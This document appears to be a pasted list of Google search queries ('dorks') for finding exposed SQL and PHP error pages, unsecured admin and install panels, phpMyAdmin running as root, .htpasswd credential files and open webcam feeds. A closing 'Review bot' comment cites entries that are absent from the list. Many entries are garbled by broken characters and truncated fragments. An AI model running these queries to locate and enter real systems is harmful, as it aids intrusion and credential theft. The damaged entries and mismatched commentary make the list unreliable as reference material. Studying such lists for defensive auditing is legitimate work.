“ORA-00933: SQL command not properly ended”
“ORA-12541: TNS:no listener” intitle:”error occurred”
“Parse error: parse error, unexpected T_VARIABLE” “on line” filetype:php
“PostgreSQL query failed: ERROR: parser: parse error”
“Supplied argument is not a valid MySQL result resource”
“Syntax error in query expression ” -the
“The s?ri?t whose uid is ” “is not allowed to access”
“There seems to have been a problem with the” ” Please try again by clicking the Refresh button in your web browser.”
“Unable to jump to row” “on MySQL result index” “on line”
“Unclosed quotation mark before the character string”
“Warning: Bad arguments to (join|implode) () in” “on line” -help -forum
“Warning: Cannot modify header information headers already sent”
“Warning: Division by zero in” “on line” -forum
“Warning: mysql_connect(): Access denied for user: *@*” “on line” -help -forum
“Warning: mysql_query()” “invalid query”
“Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”
“Warning: Supplied argument is not a valid File-Handle resource in”
“Warning:” “failed to open stream: HTTP request failed” “on line”
“Warning:” “SAFE MODE Restriction in effect.” “The s?ri?t whose uid is” “is not allowed to access owned by uid 0 in” “on line”
“SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”
An unexpected token “END-OF-STATEMENT” was found
Coldfusion Error Pages
filetype:asp + “[ODBC SQL”
filetype:asp “Custom Error Message” Category Source
filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”
filetype:php inurl:”logging.php” “Discuz” error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:”Error Message : Error loading required libraries.”
intext:”Warning: Failed opening” “on line” “include_path”
intitle:”Apache Tomcat” “Error Report”
intitle:”Default PLESK Page”
intitle:”Error Occurred While Processing Request” +WHERE (SELECT|INSERT) filetype:cfm
intitle:”Error Occurred” “The error occurred in” filetype:cfm
intitle:”Error using Hypernews” “Server Software”
intitle:”Execution of this s?ri?t not permitted”
intitle:”Under construction” “does not currently have”
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument….
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing “include_path”
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning “error on line” php sablotron
Windows 2000 web server error messages
“ftp://” “www.eastgame.net”
“html allowed” guestbook
: vBulletin Version 1.1.5″
“Select a database to view” intitle:”filemaker pro”
“set up the administrator user” inurl:pivot
“There are no Administrators Accounts” inurl:admin.php -mysql_fetch_row
“Welcome to Administration” “General” “Local Domains” “SMTP Authentication” inurl:admin
“Welcome to Intranet”
“Welcome to PHP-Nuke” congratulations
“Welcome to the Prestige Web-Based Configurator”
“YaBB SE Dev Team”
“you can now password” | “this is a special page only seen by you. your profile visitors” inurl:imchaos
(“Indexed.By”|”Monitored.By”) hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:”index.php” “site=sglinks”
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:”fileman.cgi”
filetype:cgi inurl:”Web_Store.cgi”
filetype:php inurl:vAuthenticate
filetype:pl intitle:”Ultraboard Setup”
Gallery in configuration mode
Hassan Consultings Shopping Cart Version 1.18
intext:”Warning: * am able * write ** configuration file” “includes/configure.php” -
intitle:”Gateway Configuration Menu”
intitle:”Horde :: My Portal” -”[Tickets”
intitle:”Mail Server CMailServer Webmail” “5.2″
intitle:”MvBlog powered”
intitle:”Remote Desktop Web Connection”
intitle:”Samba Web Administration Tool” intext:”Help Workgroup”
intitle:”Terminal Services Web Connection”
intitle:”Uploader Uploader v6″ -pixloads.com
intitle:osCommerce inurl:admin intext:”redistributable under the GNU” intext:”Online Catalog” -demo -site:oscommerce.com
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
inurl:”/NSearch/AdminServlet”
inurl:”index.php? module=ew_filemanager”
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:”t=”
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:”ViewerFrame?Mode=”
intitle:”WJ-NT104 Main Page”
inurl:netw_tcp.shtml
intitle:”supervisioncam protocol”
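Review bot: this part of the added file repeats entries on consecutive lines and should be deduplicated before merge: `cgiirc.conf`, `inurl:netscape.hst`, `ipsec.secrets`, `phpMyAdmin dumps`, `“Incorrect syntax near”`, `ORA-00921: unexpected end of SQL command` and the `intitle:phpMyAdmin “Welcome to phpMyAdmin ***” ...` line each appear twice. The text also shows conversion damage consistent with a paste from a rendered web page rather than a plain-text source: straight quotes have become typographic quotes throughout, characters have been replaced by `?` (`s?ri?t`, `upd?t?d`, `r?seau`), the `intitle:”admin panel” +”` entry is split in two with `RedKernel”` orphaned on the following line, and `: vBulletin Version 1.1.5″` and `phpOpenTracker” Statistics` have lost their leading text or opening quote. Several lines are entry titles rather than queries (`AIM buddy lists`, `Financial spreadsheets: finance.xls`, `private key files (.key)`), and `Fichier contenant des informations sur le r?seau :` is a stray untranslated section heading, so the list mixes at least two source formats without category headings or any statement of provenance. Suggest committing from the original plain-text source, one entry per line, with a header comment naming the source and a heading per group stating what kind of exposure the group is meant to find.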